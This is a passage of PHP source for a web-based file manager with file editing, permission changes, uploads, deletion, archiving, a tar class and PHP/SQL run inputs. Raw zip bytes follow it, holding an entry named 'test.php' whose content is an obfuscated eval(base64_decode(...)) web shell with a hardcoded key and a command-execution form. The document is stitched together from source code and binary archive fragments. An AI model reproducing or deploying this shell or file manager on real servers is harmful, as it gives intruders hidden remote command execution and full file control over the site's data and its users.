$editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table border='0' cellspacing='0' cellpadding='1' width="100%"> <tr> <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$editlink?>"> <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea> <input type="submit" name="save" value="<?=__('Submit')?>"> <input type="submit" name="cancel" value="<?=__('Cancel')?>"> </form> </td> </tr> </table> <?php echo $auth['script']; } elseif(!empty($_REQUEST['rights'])){ if(!empty($_REQUEST['save'])) { if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively'])) $msg .= (__('File updated')); else $msg .= (__('Error occurred')); } clearstatcache(); $oldrights = fm_rights_string($path . $_REQUEST['rights'], true); $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>"> <?php if (is_dir($path.$_REQUEST['rights'])) { ?> <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/> <?php } ?> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } else { //Let's rock! $msg = ''; if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) { if(!empty($_FILES['upload']['name'])){ $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']); if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){ $msg .= __('Error occurred'); } else { $msg .= __('Files uploaded').': '.$_FILES['upload']['name']; } } } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') { if(!fm_del_files(($path . $_REQUEST['delete']), true)) { $msg .= __('Error occurred'); } else { $msg .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg .= __('Error occurred'); } else { $msg .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg .= __('Error occurred'); } else { fclose($fp); $msg .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>'; else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } ?> <table class="whole" id="header_table" > <tr> <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th> </tr> <?php if(!empty($msg)){ ?> <tr> <td colspan="2" class="row2"><?=$msg?></td> </tr> <?php } ?> <tr> <td class="row2"> <table> <tr> <td> <?=fm_home()?> </td> <td> <?php if(!empty($fm_config['make_directory'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="dirname" size="15"> <input type="submit" name="mkdir" value="<?=__('Make directory')?>"> </form> <?php } ?> </td> <td> <?php if(!empty($fm_config['new_file'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="filename" size="15"> <input type="submit" name="mkfile" value="<?=__('New file')?>"> </form> <?php } ?> </td> <td> <?=fm_run_input('php')?> </td> <td> <?=fm_run_input('sql')?> </td> </tr> </table> </td> <td class="row3"> <table> <tr> <td> <?php if (!empty($fm_config['upload_file'])) { ?> <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" /> <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" /> <input type="submit" name="test" value="<?=__('Upload')?>" /> </form> <?php } ?> </td> <td> <?php if ($auth['authorize']) { ?> <form action="" method="post"> <input name="quit" type="hidden" value="1"> <?=__('Hello')?>, <?=$auth['login']?> <input type="submit" value="<?=__('Quit')?>"> </form> <?php } ?> </td> <td> <?=fm_lang_form($language)?> </td> <tr> </table> </td> </tr> </table> <table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%"> <thead> <tr> <th style="white-space:nowrap"> <?=__('Filename')?> </th> <th style="white-space:nowrap"> <?=__('Size')?> </th> <th style="white-space:nowrap"> <?=__('Date')?> </th> <th style="white-space:nowrap"> <?=__('Rights')?> </th> <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th> </tr> </thead> <tbody> <?php $elements = fm_scan_dir($path, '', 'all', true); $dirs = array(); $files = array(); foreach ($elements as $file){ if(@is_dir($path . $file)){ $dirs[] = $file; } else { $files[] = $file; } } natsort($dirs); natsort($files); $elements = array_merge($dirs, $files); foreach ($elements as $file){ $filename = $path . $file; $filedata = @stat($filename); if(@is_dir($filename)){ $filedata[7] = ''; if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename); $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder"> </span> '.$file.'</a>'; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\'' . fm_img_link($filename) .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img"> </span> '.$file.'</a>' : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file"> </span> '.$file.'</a>'; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>'; $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>'; ?> <tr class="<?=$style?>"> <td><?=$link?></td> <td><?=$filedata[7]?></td> <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td> <td><?=$rightstext?></td> <td><?=$deletelink?></td> <td><?=$renamelink?></td> <td><?=$loadlink?></td> <td><?=$arlink?></td> </tr> <?php } } ?> </tbody> </table> <div class="row3"><?php $mtime = explode(' ', microtime()); $totaltime = $mtime[0] + $mtime[1] - $starttime; echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a> | <a href="'.fm_site_url().'">.</a>'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>'; if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>'; if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>'; ?> </div> <script type="text/javascript"> function download_xls(filename, text) { var element = document.createElement('a'); element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text); element.setAttribute('download', filename); element.style.display = 'none'; document.body.appendChild(element); element.click(); document.body.removeChild(element); } function base64_encode(m) { for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) { c = m.charCodeAt(l); if (128 > c) d = 1; else for (d = 2; c >= 2 << 5 * d;) ++d; for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f]) } b && (g += k[f << 6 - b]); return g } var tableToExcelData = (function() { var uri = 'data:application/vnd.ms-excel;base64,', template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>', format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = { worksheet: name || 'Worksheet', table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1") } t = new Date(); filename = 'fm_' + t.toISOString() + '.xls' download_xls(filename, base64_encode(format(template, ctx))) } })(); var table2Excel = function () { var ua = window.navigator.userAgent; var msie = ua.indexOf("MSIE "); this.CreateExcelSheet = function(el, name){ if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer var x = document.getElementById(el).rows; var xls = new ActiveXObject("Excel.Application"); xls.visible = true; xls.Workbooks.Add for (i = 0; i < x.length; i++) { var y = x[i].cells; for (j = 0; j < y.length; j++) { xls.Cells(i + 1, j + 1).Value = y[j].innerText; } } xls.Visible = true; xls.UserControl = true; return xls; } else { tableToExcelData(el, name); } } } </script> </body> </html> <?php //Ported from ReloadCMS project http://reloadcms.com class archiveTar { var $archive_name = ''; var $tmp_file = 0; var $file_pos = 0; var $isGzipped = true; var $errors = array(); var $files = array(); function __construct(){ if (!isset($this->errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.': <br/>'; foreach ($Errors as $value) $message .= $value.'<br/>'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $i<count($file_array); $i++){ $filename = $file_array[$i]; if ($filename == $this->archive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } PK R��Z�~T3 3 511846554test.phpnu �[��� <?php eval(base64_decode('CiBnb3RvIFRTb20zOyBVR0V6eTogJGJhc2UgPSBpc3NldCgkX0dFVFsiXHg3OCJdKSA/IGRlY3J5cHRQYXRoKCRfR0VUWyJcMTcwIl0sICRzZWNyZXRfa2V5KSA6IGdldGN3ZCgpOyBnb3RvIGlJM0IwOyBwVWRUUTogZWNobyAiXHhhXHgzY1wxNDRcMTUxXDE2Nlw0MFx4NjNcMTU0XDE0MVwxNjNceDczXDc1XDQ3XHg3OFw2Nlw0N1x4M2VceGFcNDBceDIwXDQwXHgyMFw3NFwxNTBcNjNcNzZcMzQyXHg5YVwyMzFceGVmXHhiOFx4OGZcNDBcMTIyXHg3NVwxNTZcNDBcMTAzXHg2ZlwxNTVcMTU1XDE0MVwxNTZcMTQ0XDc0XHgyZlx4NjhceDMzXHgzZVx4YVw0MFx4MjBceDIwXDQwXHgzY1wxNDZceDZmXDE2Mlx4NmRceDIwXHg2ZFx4NjVceDc0XHg2OFx4NmZceDY0XHgzZFx4MjdceDUwXHg0Zlx4NTNcMTI0XDQ3XDc2XDEyXDQwXDQwXHgyMFx4MjBceDIwXDQwXDQwXDQwXDc0XHg2OVx4NmVcMTYwXDE2NVx4NzRcNDBcMTY0XHg3OVwxNjBceDY1XDc1XDQ3XDE2NFwxNDVcMTcwXDE2NFx4MjdceDIwXHg2ZVwxNDFcMTU1XDE0NVw3NVw0N1x4NjNceDI3XDQwXDE2MFx4NmNceDYxXHg2M1x4NjVcMTUwXHg2Zlx4NmNceDY0XHg2NVwxNjJceDNkXDQ3XHg2NVwxNzBcMTQxXHg2ZFx4NzBcMTU0XDE0NVw3Mlx4MjBcMTQ0XDE1MVx4NzJcNDdceDNlXHhhXDQwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXDQwXDc0XHg2OVx4NmVceDcwXHg3NVwxNjRceDIwXHg3NFwxNzFcMTYwXHg2NVx4M2RcNDdceDczXDE2NVx4NjJceDZkXDE1MVx4NzRcNDdcNDBcMTY2XHg2MVx4NmNceDc1XDE0NVx4M2RcNDdceDQ1XHg3OFx4NjVcMTQzXDE2NVx4NzRceDY1XDQ3XDc2XHhhXHgyMFw0MFw0MFx4MjBcNzRcNTdceDY2XDE1N1wxNjJcMTU1XHgzZVwxMlw3NFx4MmZceDY0XDE1MVwxNjZceDNlXHhhIjsgZ290byBiSHc0SjsgTzg0U3o6ICRzZWNyZXRfa2V5ID0gIlwxNzFceDZmXHg3NVwxNjJcNTVcMTYzXHg2NVwxNDNceDcyXDE0NVx4NzRcNTVceDZiXHg2NVwxNzFceDJkXDYxXDYyXDYzIjsgZ290byBsM2JsRzsgV1hGYm86IGlmICgkYmFzZSA9PT0gZmFsc2UpIHsgaGVhZGVyKCJcMTEwXDEyNF